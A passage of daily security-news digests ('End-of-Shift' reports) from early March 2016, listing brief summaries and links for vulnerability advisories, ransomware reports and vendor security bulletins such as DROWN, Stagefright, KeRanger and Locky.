A lot of attention has been paid lately to the Cryptowall / Ransomware family (as in crime family) of malware. What I get asked a lot by clients is how can I prepare / prevent an infection? Prepare is a good word in this case, it encompasses both prevention and setting up processes for dealing with the infection that will inevitably happen in spite of those preventative processes. Plus it's the first step in the Preparation / Identification / Containment / Eradication / Restore Service / Lessons...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20821&rss
*** Android security updates: always trouble with Stagefright ***
---------------------------------------------
Google cannot get rid of the Stagefright problems. The March update, too, patches several critical vulnerabilities in the multimedia services of Android devices. Updates for Nexus smartphones and tablets are already being distributed.
---------------------------------------------
http://heise.de/-3131138
*** RSA: Seven Attack Trends (March 3, 2016) ***
---------------------------------------------
At the RSA Conference in San Francisco last week, SANS researchers described seven cyberattack trends that are likely to come up again and again over the course of this year: Weaponization of Windows PowerShell; Stagefright-like mobile vulnerabilities; Developer environment vulnerabilities like Xcode Ghost; Industrial Control System (ICS) attacks; Targeting unsecure third-party software components; Internet of (Evil) Things; and Ransomware...
---------------------------------------------
http://www.sans.org/newsletters/newsbites/r/18/19/201
*** MS16-MAR - Microsoft Security Bulletin Summary for March 2016 - Version: 1.0 ***
---------------------------------------------
V1.0 (March 8, 2016): Bulletin Summary published.
---------------------------------------------
https://technet.microsoft.com/en-us/library/security/MS16-MAR
*** [R1] PHP < 5.6.18 / PCRE < 8.38 Vulnerabilities Affect Tenable SecurityCenter ***
---------------------------------------------
http://www.tenable.com/security/tns-2016-04
*** Bugtraq: [security bulletin] HPSBHF03557 rev.1 - HPE Networking Products using Comware 7 (CW7) running NTP, Remote Denial of Service (DoS) ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537721
*** Persistent Cross-Site Scripting Vulnerability in Citrix XenMobile Server 10.x Web User Interface ***
---------------------------------------------
This vulnerability could potentially be used to execute malicious client-side script in the same context as legitimate content from the web server; if this vulnerability is used to execute script in the browser of an authenticated administrator then the script may be able to gain access to the administrator's session or other potentially sensitive information.
---------------------------------------------
https://support.citrix.com/article/CTX207499
*** Cisco Cable Modem with Digital Voice Remote Code Execution Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco ASA Content Security and Control Security Services Module Denial of Service Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco Wireless Residential Gateway with EDVA Denial of Service Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco Wireless Residential Gateway Information Disclosure Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 07-03-2016 18:00 − Tuesday 08-03-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** PhishLabs on the growing sophistication of business email scams ***
---------------------------------------------
At the 2016 RSA Conference, CSO's Steve Ragan chats with Joseph Opacki from PhishLabs about how cyber-criminals are becoming increasingly smarter about targeting specific high-end business users to try and steal data or money.
---------------------------------------------
http://www.cio.com/video/63026/phishlabs-on-the-growing-sophistication-of-b…
*** Google plugs 19 holes in newest Android security update ***
---------------------------------------------
In the March 2016 security update for the Android Open Source Project (AOSP), Google has fixed 19 security issues, seven of which are considered to be critical. Among these, and admittedly the most important to patch, are two remote code execution vulnerabilities in - yes, you've guessed it - Mediaserver. Mediaserver is a service in Android that allows the device to index media files that are located on it. The vulnerabilities in question (CVE-2016-0815, CVE-2016-0816)...
---------------------------------------------
https://www.helpnetsecurity.com/2016/03/08/android-security-update/
*** Free and Commercial Tools to Implement the Center for Internet Security (CIS) Security Controls, Part 12: Controlled Use of Administrative Privileges ***
---------------------------------------------
This is Part 12 of a How-To effort to compile a list of tools (free and commercial) that can help IT administrators comply with what was formerly known as the "SANS Top 20 Security Controls". It is now known as the Center for Internet Security (CIS) Security Controls. A summary of the previous posts is here: Part 1 - we looked at Inventory of Authorized and Unauthorized Devices. Part 2 - we looked at Inventory of Authorized and Unauthorized Software. Part 3 - we looked at Secure...
---------------------------------------------
https://www.alienvault.com/blogs/security-essentials/free-and-commercial-to…
*** Cloud sellers who acted on Heartbleed sink when it comes to DROWN ***
---------------------------------------------
An out-stretched arm slowly disappears... Response to the critical web-crypto-blasting DROWN vulnerability in SSL/TLS by cloud services has been much slower than the frantic patching witnessed when the Heartbleed vulnerability surfaced two years ago.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/03/08/drown_vulne…
*** Ransomware Trojan Keranger: How to protect your Mac ***
---------------------------------------------
For the first time, working ransomware is targeting OS X users. After infection, three days remain until "Keranger" encrypts documents. Users should check whether they are affected and take countermeasures.
---------------------------------------------
http://heise.de/-3130854
*** Security Bulletins Posted ***
---------------------------------------------
Security Bulletins for Adobe Digital Editions (APSB16-06) as well as Adobe Acrobat and Reader (APSB16-09) have been published. Adobe recommends users update their product installations to the latest versions using the instructions referenced in the relevant security bulletin. A security...
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1322
*** DFN-CERT-2016-0402: ISC DHCP: A vulnerability allows a denial-of-service attack ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0402/
*** DFN-CERT-2016-0405: PuTTY: A vulnerability allows execution of arbitrary code ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0405/
*** DFN-CERT-2016-0400: BlackBerry powered by Android: Multiple vulnerabilities allow, among other things, execution of arbitrary code with the privileges of the Mediaserver ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0400/
*** Bugtraq: ESA-2016-012: EMC Documentum xCP - User Information Disclosure Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537712
*** [R3] OpenSSL 20160301 Advisory Affects Tenable Nessus ***
---------------------------------------------
http://www.tenable.com/security/tns-2016-03
*** Security Advisory: Libpng vulnerability CVE-2015-8472 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/81/sol81903701.html?…
*** Security Advisory: OpenSSL vulnerabilities CVE-2016-0703, CVE-2016-0704, and CVE-2016-0800 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/23/sol23196136.html?…
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: GNU C library (glibc) and OpenSSL vulnerabilities affect WebSphere Cast Iron. (CVE-2015-7547 CVE-2015-3193 CVE-2015-3194 CVE-2015-3195 CVE-2015-3196 CVE-2015-1794) ***
http://www.ibm.com/support/docview.wss?uid=swg21978339
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in current releases of IBM SDK for Node.js in IBM Bluemix (CVE-2015-3197, CVE-2016-2086, CVE-2016-2216) ***
http://www.ibm.com/support/docview.wss?uid=swg21977242
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in OpenSSH affect IBM XIV Gen2 (CVE-2016-0777, CVE-2016-0778) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005618
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in OpenSSH affect IBM XIV Gen3 (CVE-2016-0777, CVE-2016-0778) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005619
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM XIV Gen3 systems and IBM XIV Management Tools (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005615
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 04-03-2016 18:00 − Monday 07-03-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** When a WordPress Plugin Goes Bad ***
---------------------------------------------
Last summer we shared a story about the SweetCaptcha WordPress plugin injecting ads and causing malvertising problems for websites that leveraged the plugin. When this plugin was removed from the official WordPress Plugin directory, the authors revived another WordPress account with a long abandoned plugin and uploaded SweetCaptcha as a "new version" of that plugin.
---------------------------------------------
https://blog.sucuri.net/2016/03/when-wordpress-plugin-goes-bad.html
*** Novel method for slowing down Locky on Samba server using fail2ban, (Sun, Mar 6th) ***
---------------------------------------------
One of our loyal readers, Gebhard, pointed out a nice post (in German) on how to slow down Locky if you are using a Samba server for filesharing in your environment. The technique takes advantage of fail2ban and some additional Samba logging to keep Locky from encrypting all the files on the share. It is worth a look. --------------- Jim Clausing,
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20805&rss
*** KeRanger: First ransomware campaign threatens Mac OS X ***
---------------------------------------------
For the first time, a ransomware Trojan is also encrypting data of Mac users. The malware hides in the BitTorrent client Transmission. Apple and the developers have already responded.
---------------------------------------------
http://heise.de/-3129346
*** Bundestag hack: Attack using common methods and open-source tools ***
---------------------------------------------
Internal documents bring new details about last year's hacking attack on the Bundestag to light: the attackers used common methods and freely available tools.
---------------------------------------------
http://heise.de/-3129862
*** Maintainers of new generic top level domains have a hard time keeping abuse in check ***
---------------------------------------------
Generic top-level domains (gTLDs) that have sprung up in recent years have become a magnet for cybercriminals, to the point where some of them host more malicious domains than legitimate ones. Spamhaus, an organization that monitors spam, botnet and malware activity on the Internet, has published a list of the world's top 10 "worst TLDs" on Saturday. What's interesting is that the list is not based on the overall number of abusive domains hosted under a TLD, but on the TLD's ratio of...
---------------------------------------------
http://www.cio.com/article/3041338/maintainers-of-new-generic-top-level-dom…
*** DFN-CERT-2016-0398: Squid: Two vulnerabilities allow, among other things, execution of arbitrary code ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0398/
*** HPE Network Automation Unspecified Flaws Let Remote Users Execute Arbitrary Code and Obtain Potentially Sensitive Information ***
---------------------------------------------
http://www.securitytracker.com/id/1035192
*** Filr 2.0 - Security Update 1 ***
---------------------------------------------
Abstract: Security Updates for glibc and nscd on the Filr, Search and MySQL 2.0.0 appliances (CVE-2015-7547). Document ID: 5237510. Security Alert: Yes. Distribution Type: Public. Entitlement Required: No. Files: MySQL-2.0.0.182.HP.zip (21.71 MB), Filr-2.0.0.422.HP.zip (23.03 MB), Search-2.0.0.400.HP.zip (21.71 MB). Products: Filr 2. Superseded Patches: None
---------------------------------------------
https://download.novell.com/Download?buildid=LqikC-Hosps~
*** Filr 1.2 - Security Update 2 ***
---------------------------------------------
Abstract: Security Updates for glibc and nscd on the Filr, Search and MySQL 1.2.0 appliances (CVE-2015-7547). Document ID: 5237480. Security Alert: Yes. Distribution Type: Public. Entitlement Required: No. Files: Filr-1.2.0.861.HP.zip (23.03 MB), MySQL-1.2.0.413.HP.zip (21.71 MB), Search-1.2.0.998.HP.zip (21.71 MB). Products: Filr 1.2. Superseded Patches: None
---------------------------------------------
https://download.novell.com/Download?buildid=PQBDzZUKFac~
*** Sentinel 7.4 SP1 (Sentinel 7.4.1.0) Build 2512 ***
---------------------------------------------
Abstract: Sentinel 7.4.1 upgrade for Sentinel 7.4. Document ID: 5237090. Security Alert: Yes. Distribution Type: Public. Entitlement Required: No. Files: sentinel_server-7.4.1.0-2512.x86_64.tar.gz.sha256 (109 bytes), sentinel_server-7.4.1.0-2512.x86_64.tar.gz (1.74 GB). Products: Sentinel, Sentinel 7.3, Sentinel 7.3.1, Sentinel 7.3.2, Sentinel 7.4, Sentinel 7.2, Sentinel 7.2.1, Sentinel 7.2.2, Sentinel 7.4.1. Superseded Patches: None
---------------------------------------------
https://download.novell.com/Download?buildid=ZEMvbiAk5k8~
*** innovaphone IP222 / IP232 Denial Of Service ***
---------------------------------------------
Topic: innovaphone IP222 / IP232 Denial Of Service. Risk: Medium. Advisory ID: SYSS-2015-053. Product: innovaphone IP222/IP232. Manufacturer: inn...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016030035
*** Bugtraq: Apple iOS v9.2.1 - Multiple PassCode Bypass Vulnerabilities (App Store Link, Buy Tones Link & Weather Channel Link) ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537708
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in libpng affect PowerKVM (CVE-2015-8126, CVE-2015-8472) ***
2016-03-07T08:14:25-05:00
http://www.ibm.com/support/docview.wss?uid=isg3T1023374
---------------------------------------------
*** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM MQ Appliance (CVE-2015-7547) ***
http://www.ibm.com/support/docview.wss?uid=swg21977498
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in the GNU C Library (glibc) affect PowerKVM ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023385
---------------------------------------------
*** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM Security Guardium (CVE-2015-7547) ***
http://www.ibm.com/support/docview.wss?uid=swg21977444
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in grub2 affect PowerKVM (CVE-2015-5281, CVE-2015-8370) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023376
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in netcf affects PowerKVM (CVE-2014-8119) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023367
---------------------------------------------
*** IBM Security Bulletin: Lotus Protector for Mail affected by libcurl vulnerability (CVE-2016-0755) ***
http://www.ibm.com/support/docview.wss?uid=swg21977843
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in libxml2 affect PowerKVM ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023350
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in bind affects PowerKVM (CVE-2015-8704) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023372
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in MIT Kerberos 5 (krb5) affect PowerKVM (CVE-2014-5355, CVE-2015-2694) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023354
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in file affect PowerKVM ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023349
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in xfsprogs affects PowerKVM (CVE-2012-2150) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023356
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in Gnu binutils affect PowerKVM ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023355
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 03-03-2016 18:00 − Friday 04-03-2016 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
*** Upcoming Security Updates for Adobe Acrobat and Reader (APSB16-09) ***
---------------------------------------------
A prenotification Security Advisory has been posted regarding upcoming updates for Adobe Acrobat and Reader scheduled for Tuesday, March 8, 2016. We will continue to provide updates on the upcoming release via the Security Advisory as well as the ..
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1319
*** Open-Xchange Guard 2.2.0 / 2.0 Private Key Disclosure ***
---------------------------------------------
The "getprivkeybyid" API call is used to download a PGP Private Key for a specific user after providing authentication credentials. Clients provide the "id" and "cid" parameter to specify the current user by its user- and context-ID. The "auth" parameter contains ..
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016030034
*** Criminals often rely on default passwords ***
---------------------------------------------
In Project Heisenberg, honeypots offered an RDP port. Security researchers subsequently analysed the login data used by attackers.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Kriminelle-setzen-oft-auf-Standard-P…
*** NCSC publishes factsheet Disable SSL 2.0 and upgrade OpenSSL ***
---------------------------------------------
On 1 March, a group of researchers presented the DROWN attack methods for TLS. An attacker uses DROWN to abuse servers that still support SSL 2.0. Servers that run a vulnerable version of OpenSSL can be abused in the same way, regardless of whether they support SSL 2.0. An attacker who is able to intercept network traffic that is secured with TLS, may attempt to decrypt this traffic ..
---------------------------------------------
https://www.ncsc.nl/english/current-topics/news/ncsc-publishes-factsheet-di…
*** Mit Sicherheit - BSI-Magazin 2016/01 ***
---------------------------------------------
In this issue of the BSI-Magazin we look back on a quarter of a century of German IT security history, as the Bundesamt für Sicherheit in der Informationstechnik celebrates this year its ..
---------------------------------------------
https://www.bsi.bund.de/DE/Publikationen/BSI-Magazin/BSI-Magazin_node.html
*** Amazon App Store distributes Android Trojan ***
---------------------------------------------
Can spy on users extensively, but can also be uninstalled easily ..
---------------------------------------------
http://derstandard.at/2000032287420
*** Drown attack: Server4You exposes thousands of affected customers ***
---------------------------------------------
In an abuse ticket sent by Server4You to customers with servers threatened by the Drown attack, tens of thousands of IP addresses and ports of affected servers appear. The hoster also gave its customers an ultimatum, but has since backed down.
---------------------------------------------
http://heise.de/-3128656
*** Amazon removes encryption feature from Fire tablets ***
---------------------------------------------
Because customers did not use it, Amazon has removed the Android feature for encrypting the storage from the operating system of its Fire tablets. At least that is how the company explains the step, which has now become public.
---------------------------------------------
http://heise.de/-3128844
*** Chaos Computer Club gets sister association in Vienna ***
---------------------------------------------
General meeting on Saturday - hacker gathering Easterhegg takes place in Salzburg
---------------------------------------------
http://derstandard.at/2000032301583
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 02-03-2016 18:00 − Thursday 03-03-2016 18:00
Handler: Stephan Richter
Co-Handler: Alexander Riepl
*** Cisco Unified Communications Domain Manager Cross-Site Scripting Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** LibreSSL Unaffected By DROWN ***
---------------------------------------------
The OpenBSD people forked and heavily cleaned up OpenSSL to create LibreSSL due to dissatisfaction with the maintenance of OpenSSL, culminating in the Heartbleed bug. The emphasis has been on cleaning up the code and improving security, which includes removing things such as SSL2, which has fundamental security flaws. As a result, LibreSSL is not ..
---------------------------------------------
http://it.slashdot.org/story/16/03/02/1620221/libressl-unaffected-by-drown
*** Multiple Vulnerabilities in OpenSSL Affecting Cisco Products: March 2016 ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco Prime Infrastructure Log File Remote Code Execution Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Schneider Electric Building Operation Automation Server Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a vulnerability in servers programmed with Schneider Electric's StruxureWare Building Operation software.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01
*** Rockwell Automation Allen-Bradley CompactLogix Reflective Cross-Site Scripting Vulnerability ***
---------------------------------------------
This advisory is a follow-up to the alert titled ICS-ALERT-15-225-01A Rockwell Automation 1766-L32 Series Vulnerability that was published August 13, 2015, on the NCCIC/ICS-CERT web site. This advisory contains mitigation details for a cross-site scripting vulnerability in Rockwell Automation's CompactLogix application.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-061-02
*** Windows Built-In PDF Reader Exposes Edge Browser To Hacking ***
---------------------------------------------
Edge, Microsoft's new browser, uses the WinRT PDF library to automatically embed and present PDF files while navigating the web. This is what Java does with applets, and Flash with SWF files -- it unintentionally allows a hacker to append malicious code to PDF files and trigger drive-by attacks, which exploit WinRT ..
---------------------------------------------
http://news.slashdot.org/story/16/03/02/2210256/windows-built-in-pdf-reader…
*** Open-Xchange Guard Access Control Flaw Lets Remote Authenticated Users Obtain Private Keys in Certain Cases ***
---------------------------------------------
http://www.securitytracker.com/id/1035174
*** Google Analytics Counter - Moderately Critical - CSRF - SA-CONTRIB-2016-011 ***
---------------------------------------------
The Google Analytics Counter module provides total pageview counts for each page on a website. In that it is similar to the core Statistics module counter, but it is much lighter and ultimately faster because it draws on ..
---------------------------------------------
https://www.drupal.org/node/2679515
*** Register now for the International NCSC One Conference 2016 ***
---------------------------------------------
Protecting Bits & Atoms is the theme for our international One Conference 2016. It is especially timely given the increasingly connected physical and digital worlds and how information and communication technologies (ICT) have ingrained themselves into the very fabric of our society. The ONE conference will take place on Tuesday April 5 and Wednesday April 6 at the World Forum in The Hague, The Netherlands.
---------------------------------------------
https://www.ncsc.nl/english/current-topics/news/register-now-for-the-intern…
*** How fraudsters can abuse Apple Pay ***
---------------------------------------------
Apple Pay is convenient and considered secure. But the system can be abused by criminals to create digital copies of credit cards.
---------------------------------------------
http://www.golem.de/news/security-wie-betrueger-apple-pay-missbrauchen-koen…
*** Java Deserialization Attacks with Burp ***
---------------------------------------------
This blog is about Java deserialization and the Java Serial Killer Burp extension. If you want to download the extension and skip past all of this, head to the Github page here. The recent Java deserialization attack that was discovered has provided a large window of opportunity for penetration testers to gain access to the underlying systems that Java applications communicate with.
---------------------------------------------
https://blog.netspi.com/java-deserialization-attacks-burp/
*** Valve informs Steam users about Christmas data breach ***
---------------------------------------------
Almost three months after the massive data breach, Valve is now informing the affected users. In the meantime they had probably long forgotten the problem.
---------------------------------------------
http://heise.de/-3127829
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 01-03-2016 18:00 − Wednesday 02-03-2016 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Threat Actors Behind "Shrouded Crossbow" Create BIFROSE for UNIX ***
---------------------------------------------
We recently came across a variant of the BIFROSE malware that has been rewritten for UNIX and UNIX-like systems. This is the latest tool developed by attackers behind operation Shrouded Crossbow, which have produced other BIFROSE variants such as KIVARS and KIVARS x64. UNIX-based operating systems are widely used in servers, workstations, and even mobile devices. With a lot of highly confidential data found in these servers and devices, a UNIX version of BIFROSE can certainly be classified as a...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/m3eM40z3oI8/
*** Cachebleed attack: CPU cache can reveal private keys ***
---------------------------------------------
Researchers have succeeded in eavesdropping on OpenSSL's RSA encryption operations by means of a cache-timing attack and thereby recovering the private key. The Cachebleed attack exploits access conflicts on the cache memory.
---------------------------------------------
http://www.golem.de/news/cachebleed-angriff-cpu-cache-kann-private-schluess…
*** Let's ride with TeslaCrypt ***
---------------------------------------------
TeslaCrypt is a ransomware spread by e-mails or exploit kits. It encrypts your files and asks you to pay in order to retrieve the decryption key. The current version is 3.0. Many analyses are already available on the Internet. In this article we are focusing on two aspects of TeslaCrypt: - The attack vector - The web callback...
---------------------------------------------
http://thisissecurity.net/2016/03/02/lets-ride-with-teslacrypt/
*** Security: Alleged Locky warning from the BKA is a Trojan ***
---------------------------------------------
The fear of Locky is now apparently being exploited by criminals. An e-mail purportedly from the Bundeskriminalamt warns about the crypto Trojan and offers a removal tool - which itself contains malware.
---------------------------------------------
http://www.golem.de/news/security-angebliche-locky-warnung-vom-bka-ist-ein-…
*** $17 smartwatch sends something to random Chinese IP address ***
---------------------------------------------
Samsung Gear 2 also has some problems, researcher says. RSA BSides: A cheap smart watch often peddled on eBay uses a pairing app for Android or iOS that contains a backdoor that quietly connects to an unknown Chinese IP address.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/03/02/chinese_bac…
*** iPhone fingerprint can be fooled with plasticine ***
---------------------------------------------
A manufacturer of fingerprint sensors shows how easily Apple's Touch ID can be bypassed with fake fingerprints.
---------------------------------------------
http://futurezone.at/produkte/iphone-fingerabdruck-laesst-sich-mit-plastili…
*** The DROWN attack on SSL/TLS ***
---------------------------------------------
Here we go again: there is a media frenzy around a newly discovered vulnerability in SSL/TLS. There is a name (DROWN = Decrypting RSA with Obsolete and Weakened eNcryption) and a fancy logo. Everything can be read at: [...] We have looked at it and decided not to publish an official warning about it. The problem is not as urgent and dramatic as some...
---------------------------------------------
http://www.cert.at/services/blog/20160302151126-1688.html
*** Django Bugs Let Remote Users Conduct Redirect and Cross-Site Scripting Attacks and Determine Valid Usernames ***
---------------------------------------------
http://www.securitytracker.com/id/1035152
*** DFN-CERT-2016-0366: Perl: Multiple vulnerabilities allow, among other things, execution of arbitrary code with user privileges ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0366/
*** Intel Security - Security Bulletin: Protected resource access bypass vulnerability resolved in multiple McAfee endpoint products for Microsoft Windows ***
---------------------------------------------
Multiple McAfee endpoint products include a private mechanism to access settings and files protected by self-protection rules. This mechanism is not sufficiently secure and may be misused to access registry keys and files that should be protected from tampering.
---------------------------------------------
https://kc.mcafee.com/corporate/index?page=content&id=SB10151
*** Schneider Electric Building Operation Application Server Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a vulnerability in servers programmed with Schneider Electric's StruxureWare Building Operation software.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01
*** Rockwell Automation Allen-Bradley CompactLogix Reflective Cross-Site Scripting ***
---------------------------------------------
This advisory is a follow-up to the alert titled ICS-ALERT-15-225-01A Rockwell Automation 1766-L32 Series Vulnerability that was published August 13, 2015, on the NCCIC/ICS-CERT web site. This advisory contains mitigation details for a cross-site scripting vulnerability in Rockwell Automation's CompactLogix application.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-061-02
*** Cisco Security Advisories ***
---------------------------------------------
*** Cisco NX-OS Software TCP Netstack Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Nexus 3000 Series and 3500 Platform Switches Insecure Default Credentials Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Web Security Appliance HTTPS Packet Processing Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco NX-OS Software SNMP Packet Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco FireSIGHT System Software Convert Timing Channel Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco FireSIGHT System Software Device Management UI Cross-Site Scripting Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM Security Privileged Identity Manager Virtual Appliance (CVE-2015-7547) ***
http://www.ibm.com/support/docview.wss?uid=swg21978009
---------------------------------------------
*** IBM Security Bulletin: Lotus Protector for Mail affected by glibc, getaddrinfo stack-based buffer overflow (CVE-2015-7547) ***
http://www.ibm.com/support/docview.wss?uid=swg21977368
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM Marketing Platform, IBM Campaign, IBM Predictive Insight, IBM Contact Optimization, IBM Marketing Operations (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21976886
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in the GSKit component of IBM Tivoli Storage Manager Fastback for Workstations (CVE-2016-0201) ***
http://www.ibm.com/support/docview.wss?uid=swg21974685
---------------------------------------------
*** Security Bulletin: Vulnerabilities in OpenSSL and MD5 Signature and Hash Algorithm (CVE-2015-7575) affect IBM System Networking RackSwitch products. ***
http://www.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5099210
---------------------------------------------
*** Security Bulletin: Multiple vulnerabilities, including MD5 Signature and Hash Algorithm (CVE-2015-7575), affect IBM Flex System Networking Switches ***
http://www.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5099200
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in libpng affect IBM Cognos Metrics Manager (CVE-2015-8126, CVE-2015-8472, CVE-2015-8540) ***
http://www.ibm.com/support/docview.wss?uid=swg21976924
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM Client Application Access (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21977618
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 29-02-2016 18:00 − Tuesday 01-03-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Bleichenbacher attack: DROWN decrypts using an ancient SSL protocol ***
---------------------------------------------
No modern browser supports the old SSL protocol version 2. Nevertheless, it can become a security risk as long as servers keep supporting it for compatibility reasons. It does not even have to be the same server.
---------------------------------------------
http://www.golem.de/news/bleichenbacher-angriff-drown-entschluesselt-mit-ur…
*** The Definitive Guide on Win32 to NT Path Conversion ***
---------------------------------------------
Posted by James Forshaw, path'ological reverse engineer. How the Win32 APIs process file paths on Windows NT is a tale filled with backwards compatibility hacks, weird behaviour, and beauty. Incorrect handling of Win32 paths can lead to security vulnerabilities. This blog post is to try and give a definitive* guide on the different types of paths supported by the OS. I'm going to try and avoid discussion of quirks in the underlying filesystem implementations (such as NTFS...
---------------------------------------------
http://googleprojectzero.blogspot.com/2016/02/the-definitive-guide-on-win32…
*** De-obfuscating malicious Vbscripts ***
---------------------------------------------
With the returned popularity of Visual Basic as a first attack vector in mind, we took a look at de-obfuscating a few recent .vbs files, starting with a very easy one and progressing to a much more complex script.
---------------------------------------------
https://blog.malwarebytes.org/intelligence/2016/02/de-obfuscating-malicious…
*** Look Into Locky ***
---------------------------------------------
Some sources say that Locky is the latest ransomware created and released in the wild by the Dridex gang. Our studies indicate that it is well prepared, which means that the threat actor(s) behind it have invested in it.
---------------------------------------------
https://blog.malwarebytes.org/intelligence/2016/03/look-into-locky/
*** OpenSSL Security Advisories ***
---------------------------------------------
CVE-2016-0800 (OpenSSL advisory) [High severity]
CVE-2016-0705 (OpenSSL advisory) [Low severity]
CVE-2016-0798 (OpenSSL advisory) [Low severity]
CVE-2016-0797 (OpenSSL advisory) [Low severity]
CVE-2016-0799 (OpenSSL advisory) [Low severity]
CVE-2016-0702 (OpenSSL advisory) [Low severity]
CVE-2016-0703 (OpenSSL advisory) [High severity]
CVE-2016-0704 (OpenSSL advisory) [Moderate severity]
---------------------------------------------
https://openssl.org/news/vulnerabilities.html
*** VU#938151: Forwarding Loop Attacks in Content Delivery Networks may result in denial of service ***
---------------------------------------------
